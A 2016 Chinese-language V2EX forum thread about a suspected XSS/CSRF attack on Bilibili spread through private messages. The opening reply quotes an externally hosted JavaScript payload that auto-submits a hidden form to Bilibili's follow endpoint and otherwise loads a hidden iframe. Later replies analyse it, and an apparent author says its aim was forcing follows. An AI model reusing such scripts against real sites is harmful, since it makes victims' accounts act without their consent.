这几天 B 站是不是又出现 XSS 漏洞了?收到奇怪的私信

2016-02-04 01:04:08 +08:00
 yksoft1
4364 次点击
所在节点    信息安全
18 条回复
yksoft1
2016-02-04 01:16:13 +08:00
http://xbilibili.3990577.com/xbilibili.js

var strhtml = '';

if (self != top) {
strhtml += '<form id="xbilibili" action="http://space.bilibili.com/ajax/friend/AddAttention" method="post">';
strhtml += '<input type="text" name="mid" value="4926267" />';
strhtml += '</form>';

$(document.body).append(strhtml);
$("#xbilibili").submit();
}else{
strhtml = '<iframe src="http://message.bilibili.com/#whisper/rid216246424b93bed4331ba30d5c0371d1" style="display: none"></iframe>';

$(document.body).append(strhtml);
}


不仅试图强行加关注,还试图另外开一个 iframe

域名 whois 里面出来一个 email, flhack@vip.qq.com 自称黑客还给 TX 交 VIP 。。。
这个 email 查可以查到一个博客 http://www.hackblog.cn/
virusdefender
2016-02-04 01:35:37 +08:00
这个 xss 看着并没成功,但是楼上贴的 js 貌似暴露了一个 csrf
BROWNURSIDAE
2016-02-04 01:36:47 +08:00
那个 meiliwang110 我认识
aprikyblue
2016-02-04 08:25:19 +08:00
坐等 “我就是那个 meiliwang110 ” 系列
ragnaroks
2016-02-04 09:01:02 +08:00
a 站也是
SourceMan
2016-02-04 09:30:43 +08:00
微博可以换私信界面的皮肤啦?
RIcter
2016-02-04 09:37:06 +08:00
http://www.wooyun.org/whitehats/Down/

不行了他 blog 太中二了- -
RIcter
2016-02-04 09:39:25 +08:00
..这个人我还见过,之前一起在杭电打比赛..233((
erevus
2016-02-04 10:24:48 +08:00
是的 已经修补好了.
所以问题来了,同样是 Java 为什么别人家的修复方式不会导致中文乱码也不会导致程序效率低呢?
luoisnotgod
2016-02-04 13:01:22 +08:00
@yksoft1 首先我没自称黑客啊。。那个 js 其实不是试图 iframe ,是因为跨域请求的问题。目的是强行加关注。
luoisnotgod
2016-02-04 13:02:03 +08:00
@RIcter 哥,哪里中二了,你说我改。。
zander
2016-02-04 13:09:33 +08:00
得,正主来了。
yexm0
2016-02-04 13:16:24 +08:00
世界真细小
yangff
2016-02-04 13:53:06 +08:00
“这个 XSS 本来是内部安全测试时候发现了,已经修好的。但是上周开发手贱回滚版本了,然后上周又被我发现了。他说这个星期二上新版本修复这个问题...不说了,我去切他 JJ...”

哈哈哈哈哈
RIcter
2016-02-04 14:09:36 +08:00
@luoisnotgod 233 ,博客主题
luoisnotgod
2016-02-04 14:28:24 +08:00
@RIcter 好吧,晚上就改。当初纯属为了 seo ,就一直没大改过。我加你 qq 了。
hcymk2
2016-02-04 14:45:32 +08:00
@luoisnotgod
那个博客名字的字体别改 我觉得蛮好的.
karjarjam
2016-02-04 15:59:12 +08:00
@luoisnotgod 求博客名字字体

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/255300

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX